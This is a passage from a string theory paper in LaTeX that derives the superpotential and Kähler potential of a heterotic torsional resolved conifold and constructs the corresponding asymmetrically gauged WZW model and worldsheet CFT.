Two remarks are in order. First, combining~(\ref{intrinsic}a) and~(\ref{susy-cond}b) leads to the generic relation $W_4=\mathrm{d}\Phi$, which is indeed satisfied by the Lee form~(\ref{wt2}) by taking into account expression~(\ref{mu}). Secondly, the relation $W_5=2 W_4$ in~(\ref{wt2}) is a particular case of the formula $W_5=(-1)^{n+1} 2^{n-2} W_4$~\cite{LopesCardoso:2002hd,Gauntlett:2003cy} which holds for a manifold with $SU(n)$ structure.
\subsubsection*{Effective superpotential}
The effective superpotential of four-dimensional $\mathcal{N}=1$ supergravity for this particular solution, viewing the throat solution we consider as part of some heterotic flux compactification.
It can be derived from a generalization of the Gukov-Vafa-Witten superpotential~\cite{Gukov:1999ya}, which includes the full contribution from torsion and
$\mathcal{H}$-flux~\cite{Grana:2005ny}, or alternatively using generalized calibration methods~\cite{Koerber:2007xk}. The general expression reads:
\begin{equation}\label{superpot}
\mathcal{W}=\tfrac14\int_{\mathcal{M}_6}\Omega\wedge (H+i\mathrm{d} J)\, .
\end{equation}
We evaluate this expression on the solution~(\ref{sol-ansatz}) by using the results obtained in~(\ref{wt1}-\ref{H33}). This leads to the 'on-shell' complexified K\"ahler structure
\begin{equation}
\mathcal{H}+i\,\mathrm{d} J = iW_5^{(\bar 3)}\wedge J = -i\mu(r)\,\bar E_3\wedge J\,,
\end{equation}
which together with the first relation in~(\ref{topcond}) entails
\begin{equation}\label{superpot2}
\mathcal{W}=0
\end{equation}
identically.\footnote{As explained in~\cite{Vafa:2000wi} and systematized later in~\cite{Martucci:2006ij}, one can determine
the superpotential~(\ref{superpot}) without knowing explicitly the full background,
by introducing a resolution parameter determined by a proper calibration of the 'off-shell' superpotential, and subsequently minimizing the
latter with respect to this parameter~(see \cite{Maldacena:2009mw} for a related discussion).}
In Vafa's setup of ref.~\cite{Vafa:2000wi}, corresponding
to D5-branes wrapping the two-cycle of the resolved conifold, this leads to an $\mathcal{N}=1$ Veneziano-Yankielowicz superpotential
(where the resolution parameter is identified with the glueball superfield of the four dimensional super Yang-Mills theory), showing that the background is holographically dual to a confining theory, with a gaugino condensate. In our case having a vanishing superpotential means that the blow-up parameter $a$ corresponds to a modulus of the holographically dual $\mathcal{N}=1$ four-dimensional theory. More aspects
of the holographic duality are discussed in subsection~\ref{holo}.
\subsubsection*{A K\"ahler potential for the non-Ricci-flat conifold}
In the following, we will show that the manifold corresponding to the metric~(\ref{sol-ansatz}a) is conformally K\"ahler. This can be readily established by means of the differential conditions~(\ref{intrinsic}), as the characteristics of a given space are related to the vanishing of certain torsion classes or specific constraint relating them (see~\cite{Grana} for a general overlook).
For this purpose, we now have to determine the torsion classes for the resolved conifold space conformal to the geometry~(\ref{sol-ansatz}a):
\begin{equation}\label{metric-unwarp}
\mathrm{d} s^2_{\tilde{\mathcal{C}}_6} = \frac{\mathrm{d} r^2}{f^2} + \frac{r^2}{6}\big(\mathrm{d}\Omega_1^2 +\mathrm{d}\Omega_2^2 \big)+
\frac{r^2 f^2}{9}\tilde\omega^2\,.
\end{equation}
Again, these can be read from the differential conditions:
\begin{subequations}\label{torsion-unwarp}
\begin{align}
\mathrm{d}\tilde\Omega & = \tfrac32 \,\tilde\mu(r)\,\big( \tilde{e}^{1256}+\tilde{e}^{1346}+i(\tilde{e}^{1356}-\tilde{e}^{1246})\big)\,\\
\mathrm{d} \tilde J & = 0 \,,
\end{align}
\end{subequations}
with now
\begin{equation}
\tilde\mu(r)= \frac{\alpha'k\left(1-\left(\frac{a}{r}\right)^8\right)}{r^3 f(r)}\,.
\end{equation}
and the new set of vielbeins given by:
\begin{equation}
\tilde{e}^i = \sqrt{\frac{2}{3H}}\,e^i\,,\qquad \forall i=1,..,6\,.
\end{equation}
Repeating the analysis carried out earlier, the torsion classes are easily established:
\begin{eqnarray}
&W_1=W_2=W_3=W_4 =0\,,& \label{tr1}\\
&W_5^{(3+\bar 3)} = -2\tilde\mu(r)\, \text{Re}E^3\,,& \label{tr2}
\end{eqnarray}
The first relation~(\ref{tr1}) tells us that the manifold is complex, since $W_1=W_2=0$, and symplectic,
since the K\"ahler form $\tilde J$ is closed. Fulfilling both these conditions gives precisely a K\"ahler manifold, and the Levi Civita connection is in this case endowed with $U(3)$ holonomy.
\paragraph{The K\"ahler potential}
The K\"ahler potential for the conifold metric~(\ref{metric-unwarp}) is most easily computed by
starting from the generic definition of the (singular) conifold as a quadratic on $\mathbb{C}^4$,
whose base is determined by the intersection of this quadratic with a three-sphere of
radius $\varrho$. These two conditions are summarized in~\cite{Candelas:1989js}:
\begin{equation}\label{conif1}
\mathcal{C}_6\stackrel{\mbox{def}}{=}\sum_{A=1}^4 (w_A)^2=0\,\qquad
\sum_{A=1}^4 |w_A|^2=\varrho^2\,.
\end{equation}
One can rephrase these two conditions in terms of a $2\times 2$ matrix $W$ parametrizing the $T^{1,1}$
base of the conifold, viewed as the coset $(SU(2)\times SU(2))/U(1)$, as $W=\tfrac{1}{\sqrt{2}}\sum_{A}w^A\sigma_A$. In this language, the defining equations~(\ref{conif1}) take the form:
\begin{equation}\label{conif2}
\text{det}\,W=0\,,\qquad \text{tr}\,W^{\dagger}W = \varrho^2\,.
\end{equation}
For the K\"ahler potential $\mathcal{K}$ to generate the metric~(\ref{metric-unwarp}), it has to be invariant under the action of the rotation group $SO(4)\simeq SU(2)\times SU(2)$ of~(\ref{conif1}) and can thus only depend on $\varrho^2$. In terms of $\mathcal{K}$ and $W$, the metric on the conifold reads:
\begin{equation}\label{metric-su2}
\mathrm{d} s^2 = \Dot{\mathcal{K}}\,\text{tr}\,\mathrm{d} W^{\dagger}\mathrm{d} W + \Ddot{\mathcal{K}}\,|\text{tr}\,W^{\dagger}\mathrm{d} W|^2\,,
\end{equation}
where the derivative is $\dot{(\bullet)}\equiv \frac{\partial}{\partial\rho^2}(\bullet)$.
By defining the function $\gamma(\varrho)=\varrho^2\,\Dot{\mathcal{K}}$, the metric~(\ref{metric-su2}) can be recast into the form:
\begin{equation}
\mathrm{d} s^2 = \Dot{\gamma}\,\mathrm{d}\varrho^2 + \frac{\gamma}{4}\big(\mathrm{d}\Omega_1^2 +\mathrm{d}\Omega_2^2 \big)+
\frac{\varrho^2 \Dot{\gamma}}{4}\,\tilde\omega^2\,.
\end{equation}
Identifying this expression with the metric~(\ref{metric-unwarp}) yields two independent first order differential equations, one of them giving the expression of the radius of the $S^3$ in~(\ref{conif1}) in terms of the radial coordinate in~(\ref{metric-unwarp}):
\begin{equation}\label{ro}
\varrho = \varrho_0\,e^{{\displaystyle \tfrac32\int\frac{\mathrm{d} r}{r f^2}}}\,,\qquad \gamma(r)=\tfrac23\,r^2\,.
\end{equation}
From these relations, one derives the K\"ahler potential as a function of $r$:
\begin{equation}\label{kahpot2}
\mathcal{K}(r)=\mathcal{K}_0 + \int\frac{\mathrm{d}(r^2)}{f^2}\,.
\end{equation}
In particular, we can work out $\mathcal{K}$ explicitly in the near horizon limit~(\ref{DSL}):
\begin{equation}\label{kahlerpot}
\mathcal{K}(r)=\mathcal{K}_0 + \frac{4a^2}{3}\, \left[\left(\frac{r}{a}\right)^2 -\frac12\text{arctan}\left(\frac{r}{a}\right)^2+ \frac14\log\left(\frac{r^2-a^2}{r^2+a^2}\right)\right]\,.
\end{equation}
\begin{figure}[!ht]
\centering
\includegraphics[width=70mm]{tab5.pdf}
\caption{The K\"ahler potential for the asymptotically flat supergravity solution with $k=10000$ and $a^2/\alpha'k=\{0.0001,0.01,1\}$.}
\label{kahlerpotfig}
\end{figure}
Choosing $\varrho_0=1$, we have $\varrho=\sqrt[4]{r^8-a^8}$, which varies over $[0,\infty[$, as expected. With an
exact K\"ahler potential at our disposal, we can make an independent check that
the near horizon geometry~(\ref{sol-nhl}) is never conformally Ricci flat. Indeed,
by establishing the Ricci tensor $R_{i\bar \jmath}=\partial_i\partial_{\bar \jmath}\ln\sqrt{|g|}$ for the K\"ahler manifold~(\ref{metric-su2}), we observe that the condition for Ricci flatness
imposes the relation $\partial_{\varrho^2}[(\varrho^2 \dot{\mathcal{K}})^3]= 2\varrho^2 $~\cite{PandoZayas:2001iw}, which is
never satisfied by the potential~(\ref{kahlerpot}).
In figure~\ref{kahlerpotfig} we plot the K\"ahler potential~(\ref{kahpot2}) for the asymptotically Ricci-flat
supergravity backgrounds given in figure~\ref{tab1}. We represent $\mathcal{K}$ only for small values of $r$, since for large
$r$ it universally behaves like $r^2$. One also verifies that, for small $r$, the analytic expression~(\ref{kahlerpot}) determined in the double-scaling limit fits perfectly
the numerical result.
\section{Gauged WZW model for the Warped Resolved Orbifoldized Conifold}
\label{gaugedsec}
The heterotic supergravity background obtained in the first section has been shown to admit a double scaling limit, isolating the throat region where an analytical solution can be found. The manifold is conformal to a cone over a non-Einstein $T^{1,1}/\mathbb{Z}_2$ base with a blown-up four-cycle, and features an asymptotically linear dilaton. The solution is parametrized by two 'shift vectors' $\vec{p}$ and $\vec{q}$ which determine the Abelian gauge bundle, and are orthogonal to each other. They are related to the \textsc{nsns} flux number $k$ as $k= \vec{p}^{\, 2} = \vec{q}^{\, 2}$.
These conditions, as well as the whole solution~(\ref{sol-nhl}), are valid in the large charge limit $\vec{p}^{\, 2} \gg 1$.
The presence of an asymptotic linear dilaton is a hint that an exact worldsheet \textsc{cft} description may exist. We will show in this section that it is indeed the case; for any
consistent choice of line bundle, a gauged \textsc{wzw} model, whose background fields are the same as the supergravity solution~(\ref{sol-nhl}), exists. Before dealing
with the details let us stress important points of the worldsheet construction:
\begin{enumerate}
\item In the blow-down limit $a\to 0$, the dependence of the metric on the radial coordinate simplifies,
factorizing the space into the (non-Einstein) $T^{1,1}$ base times the linear dilaton direction $r$.
\item The $T^{1,1}$ space is obtained as an asymmetrically gauged $SU(2)_k\times SU(2)_k$ \textsc{wzw}-model involving the
right-moving current algebra of the heterotic string.
\item In order to find the blown-up solution the linear dilaton needs to be replaced by an auxiliary $SL(2,\mathbb{R})_{k/2}$ \textsc{wzw}-model. It is gauged together with the
$SU(2)\times SU(2)$ factor, also in an asymmetric way.
\item The 'shift vectors' $\vec{p}$ and $\vec{q}$ define the embedding of the both gaugings in the $Spin (32)/\mathbb{Z}_2$ lattice
\item These two worldsheet gaugings are anomaly-free if $k = \vec{p}^{\, 2}=\vec{q}^{\, 2}-4$ and $\vec{p} \cdot \vec{q}=0$. These relations are exact in $\alpha'$.
\end{enumerate}
A detailed study of a related model, based on a warped Eguchi-Hanson space, is given in ref.~\cite{Carlevaro:2008qf}. We refer the reader to this work for more details on the techniques
used hereafter.
\subsection{Parameters of the gauging}\label{sec:param}
We consider an $\mathcal{N}=(1,0)$ \textsc{wzw} model for the group $SU(2)\times SU(2)\times SL(2,\mathbb{R})$,
whose element we denote by $(g_1,g_2,h)$. The associated levels of the $\mathcal{N}=1$ affine
simple algebras are respectively chosen to be\footnote{
It should be possible to generalize the construction starting with $SU(2)$ WZW models at non-equal levels.
Note also that the $SL(2,\mathbb{R})$ level does not need to be an integer.} $k$, $k$ and $k'$.
The left-moving central charge reads
\begin{equation}
c = 9 -\frac{12}{k}+\frac{6}{k'}\, ,
\end{equation}
therefore the choice $k'=k/2$ ensures that the central charge has the requested value $c=9$ for any $k$,
allowing to take a small curvature supergravity limit $k\to \infty$.
The first gauging, yielding a $T^{1,1}$ coset space with
a non-Einstein metric, acts on $SU(2)\times SU(2)$ as
\begin{equation}
\Big(g_1 (z,\bar z),g_2(z,\bar z)\Big) \longrightarrow \Big(e^{i\sigma_3\alpha (z,\bar z) }g_1 (z,\bar z),
e^{-i\sigma_3\alpha (z,\bar z) } g_2(z,\bar z)\Big)\,.
\label{gaugingI}
\end{equation}
This gauging is highly asymmetric, acting only by left multiplication. It has to
preserve $\mathcal{N}=(1,0)$ superconformal symmetry on the worldsheet, hence the worldsheet gauge fields
are minimally coupled to the left-moving worldsheet fermions of the super-\textsc{wzw} model.
In addition, the classical anomaly from this gauging
can be cancelled by minimally coupling some of the 32 right-moving worldsheet fermions of the heterotic worldsheet theory.
We introduce a sixteen-dimensional vector $\vec{p}$ that gives the embedding of the gauging in the $\mathfrak{so}(32)$ Cartan sub-algebra.
The anomaly cancellation condition gives the constraint\footnote{This condition involve the supersymmetric levels, as the gauging only acts
on the left-moving supersymmetric side in the $SU(2)_k \times SU(2)_k$ \textsc{wzw} model.}
\begin{equation}
k+k = 2 \vec{p}^{\, 2} \implies k = \vec{p}^{\, 2} \, .
\label{anomalyconstr0}
\end{equation}
On the left-hand side, the two factors correspond to the gauging in both $SU(2)_k$ models. We denote the components
of the worldsheet gauge field as $(A,\bar A)$.
The second gauging, leading to the resolved conifold, also acts on the $SL(2,\mathbb{R})_{k'}$ factor, along the
elliptic Cartan sub-algebra (which is time-like). Its action is given as follows:
\begin{multline}
\Big(g_1 (z,\bar z),g_2(z,\bar z),h(z,\bar z )\Big)\\ \longrightarrow\ \Big(e^{i\sigma_3\beta_1 (z,\bar z) }g_1 (z,\bar z),
e^{i\sigma_3\beta_1 (z,\bar z) } g_2(z,\bar z),e^{2i\sigma_3\beta_1 (z,\bar z) } h(z,\bar z) e^{2i\sigma_3\, \beta_2 (z,\bar z) }\Big)\,,
\label{gaugingII}
\end{multline}
and requires a pair of worldsheet gauge fields $\mathbf{B}=(B_1,B_2)$.
The left gauging, corresponding to the gauge field
$B_1$, is anomaly-free (without the need of right-moving fermions) for
\begin{equation}
2k = 4k' \, ,
\label{matchinglevels}
\end{equation}
which is satisfied by the choice $k'=k/2$ that was assumed above.\footnote{Note that the generator of the
$U(1)$ isometry in the $SL(2,\mathbb{R})$ group was chosen to be $2i\sigma_3$, which explains the factor of four in the right-hand side of equation~(\ref{matchinglevels}).}
The other gauging, corresponding to the gauge field $B_2$,
acts only on $SL(2,\mathbb{R})$, by right multiplication. This time the coupling to the worldsheet
gauge field need not be supersymmetric, as we are dealing with a $\mathcal{N}=(1,0)$ (heterotic) worldsheet.
The anomaly is again cancelled by minimally coupling worldsheet fermions from the gauge sector. Denoting the corresponding shift vector $\vec{q}$ one gets the condition
\begin{equation}
4\left(\frac{k}{2}+2\right) = 2\vec{q}^{\, 2} \implies k = \vec{q}^{\, 2}-4\, ,
\label{anomalyconstrI}
\end{equation}
which involves the bosonic level of $SL(2,\mathbb{R})$, as explained above; the constant term on the \textsc{rhs}
corresponds to the renormalization of the background fields by $\alpha'$ corrections, exact to all orders. In order to avoid the appearance of mixed anomalies in the full gauged \textsc{wzw} model,
one chooses the vectors defining the two gaugings to be orthogonal to each other
\begin{equation}
\vec{p} \cdot \vec{q} = 0 \, .
\label{anomalyconstrII}
\end{equation}
\subsection{Worldsheet action for the gauged WZW model}
The total action for the gauged \textsc{wzw} model defined above is given as follows:
\begin{equation}\label{Stot}
S_{\textsc{wzw}}(A,{\bf B}) = S_{SL(2,\mathbb{R})_{k/2+2}} + S_{SU(2)_{k-2},\, 1} + S_{SU(2)_{k-2},\, 2} + S_\text{gauge}(A,{\bf B}) + S_\text{Fer} (A,{\bf B})\, ,
\end{equation}
where the first three factors correspond to bosonic \textsc{wzw} actions, the fourth one to the bosonic terms involving the gauge fields and the
last one to the action of the minimally coupled fermions. As it proves quite involved, technically speaking, to tackle the general case for generic
values of the shift vectors $\vec{p}$ and $\vec{q}$, we restrict, for simplicity, to the 'minimal' solution of the
constraints~(\ref{anomalyconstrI},\ref{anomalyconstrII}) given by
\begin{equation}
\vec{p}=(2\ell,0^{15}) \ , \quad
\vec{q}=(0,2\ell,2,0^{13})\qquad \text{with} \quad \ell > 2\, ,
\label{minimalsol}
\end{equation}
implying in particular $k=4\ell^2$. This choice ensures that $k$ is even, which will later on show to be necessary when considering the orbifold.
The coset theory constructed with these shift vectors involves overall six Majorana-Weyl right-moving fermions from the sixteen participating in the fermionic representation of the $Spin(32)/\mathbb{Z}_2$ lattice.
We parametrize the group-valued worldsheet scalars $(g_1,g_2,h)\in SU(2)\timesSU(2)\timesSL(2,\mathbb{R})$ in terms of Euler angles as follows:
\begin{subequations}
\begin{align}
g_\ell &= e^{\frac{i}{2}\sigma_3 \psi_\ell} e^{\frac{1}{2}\sigma_1 \theta_\ell} e^{\frac{i}{2}\sigma_3 \phi_\ell}\ , \quad \ell=1,2\\
h&= e^{\frac{i}{2}\sigma_3 \phi_L} e^{\frac{1}{2}\sigma_1 \rho} e^{\frac{i}{2}\sigma_3 \phi_R}\,,\quad
\end{align}
\end{subequations}
where $\sigma_i$, $i=1,..,3$, are the usual Pauli matrices.
The action for the worldsheet gauge fields, including the couplings to the bosonic affine currents of the \textsc{wzw} models, is given by:\footnote{The left-moving purely bosonic $SU(2)\times SU(2)$ currents of the Cartan considered here are normalized as $j^3_1=i\sqrt{k-2}\,(\partial\psi_1+\cos\theta_1\,\partial\phi_1)$ and $j^3_2=i\sqrt{k-2}\,(\partial\psi_2+\cos\theta_2\,\partial\phi_2)$, while the $SL(2,\mathbb{R})$ left- and right-moving ones read $k^3=i\sqrt{\tfrac{k}{2}+2}\,(\partial\phi_L+\cosh\rho\,\partial\phi_R)$ and $\bar k^3=i\sqrt{\tfrac{k}{2}+2}\,(\bar{\partial}\phi_R+\cosh\rho\,\bar{\partial}\phi_L)$.}
\begin{multline}\label{S-gauge}
S_\text{gauge}(A,{\bf B}) = \frac{1}{8\pi} \int \mathrm{d}^2 z \,
\Big[2i\big(j^3_1 -j^3_2 \big)\bar A \,+\, 2(k-2) A\bar A
\,+\,2 B_1 i\bar k^3 +2 i\big(j^3_1 +j^3_2 + 2 k^3 \big)\bar B_2
\\ +\, 2(k-2) B_2\bar B_2
\,-\,\left(\tfrac k 2 + 2\right)\big( B_1\bar B_1 + 4 B_2\bar B_2 + 4 \cosh\rho\, B_1\bar B_2\big)
\Big] \,.
\end{multline}
The action for the worldsheet fermions comprises the left-moving Majorana-Weyl fermions coming
from the $SU(2)\timesSU(2)\timesSL(2,\mathbb{R})$ $\mathcal{N}=(1,0)$
super-\text{wzw} action,\footnote{We did not include the fermionic superpartners of the gauged currents, as they are gauged away.}
respectively ($\zeta^1, \zeta^2)$, ($\zeta^3,\zeta^4)$ and ($\zeta^5,\zeta^6)$, supplemented by six
right-moving Majorana-Weyl fermions coming from the $Spin(32)_1/\mathbb{Z}_2$ sector, that we denote $\bar\xi^a$, $a=1,..,6$:
\begin{multline}\label{S-Fer}
S_{\text{Fer}} (A,{\bf B}) =
\frac{1}{4\pi} \int \mathrm{d}^2 z \,\Big[
\sum_{i=1}^6 \zeta^i \bar{\partial} \zeta^i
- 2 \big(\zeta^1 \zeta^2 - \zeta^3 \zeta^4 \big) \bar A \\
- 2 \big(\zeta^1 \zeta^2 + \zeta^3 \zeta^4 + 2\zeta^5 \zeta^6 \big) \bar{B}_2
+\sum_{a=1}^6 \bar{\xi}^a \partial \bar{\xi}^a - 2 \ell A \, \bar{\xi}^1\bar{\xi}^2
- 2 \bar B_1 \big(\bar{\xi}^3\bar{\xi}^4 + \ell\bar{\xi}^5\bar{\xi}^6\big)
\Big]\,.
\end{multline}
Note in particular that both actions (\ref{S-gauge}) and (\ref{S-Fer}) are in keep with
the normalization of the gauge fields required by the peculiar form of the second (asymmetric)
gauging (\ref{gaugingII}).
\subsection{Background fields at lowest order in $\alpha'$}
Finding the background fields corresponding to a heterotic coset theory is in general more tricky than for the usual bosonic
or type \textsc{ii} cosets, because of the worldsheet anomalies generated by the various pieces of the asymmetrically gauged
\textsc{wzw} model. In our analysis, we will closely follow the methods used in~\cite{Johnson:1994jw,Johnson:2004zq}.
A convenient way of computing the metric, Kalb-Ramond and gauge field background from a heterotic
gauged \textsc{wzw} model consists in bosonizing the fermions
before integrating out the gauge field.
One will eventually need to refermionize the appropriate
scalars to recover a heterotic sigma-model in the standard
form, {\it i.e.} (see~\cite{Sen:1985eb,Hull:1985jv}):
\begin{multline}
S= \frac{1}{4\pi} \int\!\! \mathrm{d}^2 z\, \Big[ \tfrac{2}{\alpha'} (g_{ij} +\mathcal{B}_{ij}) \partial X^i \bar{\partial} X^j
+ g_{ij} \zeta^i \bar{\nabla} (\Omega_+) \zeta^j + \bar{\xi}^A \nabla(\mathcal{A})_{AB} \bar{\xi}^B
+\tfrac{1}{4} \mathcal{F}^{AB}_{ij} \bar{\xi}_A \bar{\xi}_B \zeta^i \zeta^j \Big]
\label{generic_sigma_action}
\end{multline}
where the worldsheet derivative $\bar{\nabla} (\Omega_+)$ is defined with respect to the spin connexion
$\Omega_+$ with torsion and the derivative $\nabla (\mathcal{A})$
with respect to the space-time gauge connexion $\mathcal{A}$.
The details of this bosonization-refermionization procedure for the coset under scrutiny are given in appendix~\ref{AppBoson}. At leading order in $\alpha'$ (or more precisely
at leading order in a $1/k$ expansion) we thus obtain, after integrating out classically the gauge fields, the bosonic part of the total action as follows:
\begin{multline}\label{Sbos-final}
S_{\textsc{b}}= \frac{k}{8\pi} \int \mathrm{d}^2 z\,\left[ \frac{1}{2}\partial\rho \bar{\partial} \rho+
\partial\theta_1 \bar{\partial} \theta_1 + \partial\theta_2 \bar{\partial} \theta_2 + \sin^2\theta_1 \,\partial\phi_1 \bar{\partial} \phi_1+
\sin^2\theta_2\,\partial\phi_2 \bar{\partial} \phi_2\right. \\
+\tfrac{1}{2}\tanh^2\rho\,(\partial\psi+\cos\theta_1\,\partial\phi_1+\cos \theta_2\,\partial \phi_2 )(\bar{\partial}\psi+\cos\theta_1\,\bar{\partial}\phi_1+\cos \theta_2\,\bar{\partial} \phi_2 ) \\
\left. +\frac{1}{2}\big(\cos\theta_1\,\partial\phi_1+\cos \theta_2\,\partial\phi_2\big)\bar{\partial}\psi- \frac{1}{2}
\partial\psi \big(\cos\theta_1\,\bar{\partial}\phi_1+\cos \theta_2\,\bar{\partial}\phi_2\big) \right]\,,
\end{multline}
while the fermionic part of the action is given by
\begin{multline}\label{Sfer-final}
S_{\textsc{f}}= \frac{k}{4\pi} \int \mathrm{d}^2 z\,\Big[ \sum_{i=1}^{6}\zeta^i\bar{\partial}\zeta^i
+ (\bar\zeta^1,\bar\zeta^2)\big[ {\rm 1\kern-.28em I}_2\,\partial +(\cos\theta_1\, \partial\phi_1-\cos\theta_2\, \partial\phi_2)\,i\sigma^2\big]\left(\begin{matrix} \bar\xi^1\\ \bar\xi^2 \end{matrix}\right) \\
+ \bar\Xi^\top \left[ {\rm 1\kern-.28em I}_4\,\partial +\frac{\ell}{\cosh\rho}\big(\partial \psi+\cos\theta_1\, \partial\phi_1+\cos \theta_2\, \partial\phi_2 \big)\,i\sigma^2\otimes \left( \begin{matrix} 1 & 0 \\ 0 & \ell \end{matrix}\right)\right] \bar\Xi \\
- \tfrac{1}{\ell}\,\bar\xi^1\bar\xi^2\,\big(\zeta^1\zeta^2-\zeta^3\zeta^4\big) +\frac{1}{\ell^2\cosh\rho}\,
\big(\bar\xi^3\bar\xi^4+\ell\bar\xi^5\bar\xi^6\big) \big(\zeta^1\zeta^2+\zeta^3\zeta^4+2\zeta^5\zeta^6\big) \Big]\, ,
\end{multline}
with $\bar\Xi^\top=(\bar\xi^3,\bar\xi^4,\bar\xi^5,\bar\xi^6)$.
In addition, a non-trivial dilaton is produced by the integration of the worldsheet gauge fields
\begin{equation}
\Phi = \Phi_0 -\tfrac12\ln\cosh\rho\,.
\end{equation}
The background fields obtained above exactly correspond to the double-scaling limit of the supergravity solution~(\ref{sol-nhl}) for a particular choice of vectors $\vec{p}$ and $\vec{q}$, after the change of coordinate
\begin{equation}
\cosh \rho = (r/a)^4 = R^4\,.
\end{equation}
As noticed in section~\ref{sec:analytic}, the blow-up parameter, which is not part of the definition of the coset \textsc{cft}, is absorbed in the dilaton zero-mode. It is straightforward --~but cumbersome~-- to extend the computation to
a more generic choice of bundle. This would lead to the background fields reproducing the generic supergravity solution~(\ref{sol-nhl}).
In this section we left aside the discussion of the necessary presence of a $\mathbb{Z}_2$ orbifold acting on the $T^{1,1}$ base of the conifold. Its important consequences will
be tackled below.
\section{Worldsheet Conformal Field Theory Analysis}
In this section we provide the algebraic construction of the worldsheet \textsc{cft} corresponding to the $\mathcal{N}=(1,0)$ gauged \textsc{wzw} model defined in section~\ref{gaugedsec}. We have shown previously that the non-linear sigma model with
the warped deformed orbifoldized conifold as target space is given by the asymmetric coset:
\begin{equation}
\frac{SL(2,\mathbb{R})_{k/2} \times\, \left(\text{\small \raisebox{-1mm}{$U(1)_\textsc{l}$}\! $\backslash$ \!\!\raisebox{1mm}{$SU(2)_k \times SU(2)_k$}}\right)}{U(1)_\textsc{l} \times U(1)_\textsc{r}} \,,
\label{cosetdef}
\end{equation}
which combines a left gauging of $SU(2) \times SU(2)$ with a pair of chiral gaugings which also involve the $SL(2,\mathbb{R})$ \textsc{wzw} model. In addition, the full worldsheet \textsc{cft} comprises
a flat $\mathbb{R}^{3,1}$ piece, the right-moving heterotic affine algebra and an $\mathcal{N}=(1,0)$ superghost system. We will see later on that the coset~(\ref{cosetdef}) has an enhanced worldsheet $\mathcal{N}=(2,0)$ superconformal symmetry, which allows to achieve $\mathcal{N}=1$ target-space supersymmetry.
In the following, we will segment our algebraic analysis of the worldsheet \textsc{cft} for clarity's sake, and deal separately with the singular conifold case, before moving on to treat the resolved geometry. This was somehow prompted by fact that the singular construction appears as a non-trivial building block of the 'resolved' \textsc{cft}, as we shall see below.
\subsection{A \textsc{cft} for the $T^{1,1}$ coset space}
\label{sec:acft}
For this purpose, we begin by restricting our discussion to the \textsc{cft} underlying the non-Einstein $T^{1,1}$ base of the conifold, which is captured by the coset space $[SU(2)\times SU(2)]/U(1)$.
In addition, this space supports a gauge bundle specified by the vector of magnetic charges $\vec{p}$. Then, the full quantum theory describing the throat region of heterotic strings on
the torsional {\it singular} conifold, can be constructed by tensoring this \textsc{cft} with $\mathbb{R}^{3,1}$, the heterotic current algebra and a linear dilaton $\mathbb{R}_\mathcal{Q}$ with background charge\footnote{In the near-brane regime of~(\ref{sol-ansatz}), the conformal factor
$H \sim Q_5/r^2$ cancels out the $r^2$ factor in front of the $T^{1,1}$ metric, hence the latter factorizes in the blow-down limit.}
\begin{equation}
\mathcal{Q}=\sqrt{\frac{4}{k}}\,.
\end{equation}
Focusing now on the $T^{1,1}$ space, we recall the action (\ref{gaugingI}) of the first gauging on the group element $(g_1,g_2)\in SU(2) \times SU(2)$, supplemented with an action on the left-moving fermions dictated by $\mathcal{N}=1$ worldsheet supersymmetry. As seen in section~\ref{gaugedsec}, the anomaly following from this gauging is compensated by a minimal coupling to the worldsheet fermions of the gauge sector of the heterotic string,
specified by the shift vector $\vec{p}$.
By algebraically solving the coset \textsc{cft} associated with this gauged \textsc{wzw} model, we are led to the following constraints on the zero-modes of the affine currents $J^{3}_{1.2}$ of the $SU(2) \times SU(2)$
Cartan subalgebra:\footnote{These are the total currents of
the $\mathcal{N}=1$ affine algebra, including contributions of the worldsheet fermion bilinears.}
\begin{equation}
\label{zeromodcond}
(J^3_1)_0-(J^{3}_2)_0 = \vec{p}\cdot \vec{Q}_\textsc{f}\, ,
\end{equation}
where $\vec{Q}_\textsc{f}$ denotes the $\mathfrak{so}(32)$ weight of a given state. The affine currents of the $\widehat{\mathfrak{so}(32)}$ algebra can be alternatively written in the fermionic or bosonic representation as
\begin{equation}
\bar{\jmath}^{i} (\bar z) = \bar{\xi}^{2i-1} \bar{\xi}^{2i} (\bar z) = \sqrt{\frac{2}{\alpha'}}\, \bar \partial X^i (\bar z)
\quad , \qquad i=1,\ldots 16 \,,
\label{cartanbosfer}
\end{equation}
and the components of $\vec{Q}_\textsc{f}$ can be identified with the corresponding fermion number (mod 2).
In order to explicitly solve the zero-mode constraint~(\ref{zeromodcond}) at the level of the one-loop partition function,
it is first convenient to split the left-moving supersymmetric $SU(2)$ characters in terms of the characters of an
$SU(2)/U(1)$ super-coset:\footnote{These super-cosets correspond to $\mathcal{N}=2$ minimal models. Some details about their characters $ C^j_m \oao{a}{b}$ are given in appendix~\ref{appchar}.}
\begin{equation}
\chi^j \vartheta \oao{a}{b} = \sum_{m \in \mathbb{Z}_{2k}} C^j_m \oao{a}{b} \Theta_{m,k}\, .
\end{equation}
Next, to isolate the linear combination of Cartan generators appearing in~(\ref{zeromodcond}),
one can combine the two theta-functions at level $k$ corresponding to the Cartan generators
of the two $\widehat{\mathfrak{su}(2)}_k$ algebras by
using the product formula:
\begin{equation}
\label{thetasum}
\Theta_{m_1,k}\Theta_{m_2,k} = \sum_{s \in \mathbb{Z}_2}
\Theta_{m_1-m_2+2ks,2k} \Theta_{m_1+m_2+2ks,2k}\, .
\end{equation}
Thus, the gauging yielding the $T^{1,1}$ base will effectively 'remove' the $U(1)$ corresponding to the first theta-function. For simplicity, we again limit ourselves to the same minimal choice
of shift vectors as in (\ref{minimalsol}), namely $\vec{p} = (2\ell,0^{15})$, $\ell \in \mathbb{Z}$, which implies by (\ref{anomalyconstr0})\footnote{We will see later
that the evenness of $k$ is a necessary condition to the resolution of the conifold by a blown-up four-cycle.}
\begin{equation}
k=4\ell^2 \, .
\end{equation}
Then the gauging will involve only a single right-moving Weyl fermion.
Its contribution to the partition function is given by a standard fermionic theta-function:
\begin{equation}
\vartheta \oao{u}{v} (\tau ) = \sum_{N \in \mathbb{Z}} q^{\frac{1}{2}(N+\frac{u}{2})^2} e^{i\pi v(N+\frac{u}{2})}\, ,
\label{fermitheta}
\end{equation}
where $\oao{u}{v}$ denote the spin structure on the torus. The solutions of the zero-mode constraint~(\ref{zeromodcond}) can
be obtained from the expressions~(\ref{thetasum}) and~(\ref{fermitheta}). It gives (see~\cite{Berglund:1995dv,Israel:2004vv} for simpler cosets of the same type):
\begin{equation}
m_1-m_2= 2\ell(2M+u) \quad , \qquad M \in \mathbb{Z}_{2\ell}\, .
\label{zeroconstr}
\end{equation}
We are then left, for given $SU(2)$ spins $j_1$ and $j_2$, with contributions to the coset partition function of the form
